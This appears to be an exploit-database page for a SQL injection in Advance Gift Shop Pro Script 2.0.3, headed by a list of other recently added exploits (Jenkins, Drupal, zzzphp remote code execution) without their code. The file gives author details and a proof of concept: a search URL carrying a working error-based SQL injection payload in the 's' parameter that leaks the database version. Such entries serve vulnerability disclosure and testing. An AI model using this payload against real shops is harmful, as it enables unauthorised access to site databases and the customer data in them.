bb86158c6e
7 changes to exploits/shellcodes Xlight FTP Server 3.9.1 - Buffer Overflow (PoC) Jenkins - Remote Code Execution Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC) Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution zzzphp CMS 1.6.1 - Remote Code Execution PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection News Website Script 2.0.5 - SQL Injection Advance Gift Shop Pro Script 2.0.3 - SQL Injection Drupal < 8.6.9 - REST Module Remote Code Execution
14 lines
No EOL
569 B
Text
14 lines
No EOL
569 B
Text
# Exploit Title: Advance Gift Shop Pro Script 2.0.3 - SQL Injection
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan[@]gmail[.]com
|
|
# Discovery Date: February 21, 2019
|
|
# Vendor Homepage: http://www.phpscriptsmall.com/
|
|
# Software Link : https://www.phpscriptsmall.com/product/gifts-shop/
|
|
# Tested Version: 2.0.3
|
|
# Tested on: Kali linux, Windows 8.1
|
|
|
|
|
|
# PoC:
|
|
|
|
# http://localhost/[PATH]/?category=&s=[SQL]&search_posttype=product
|
|
# http://localhost/[PATH]/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product |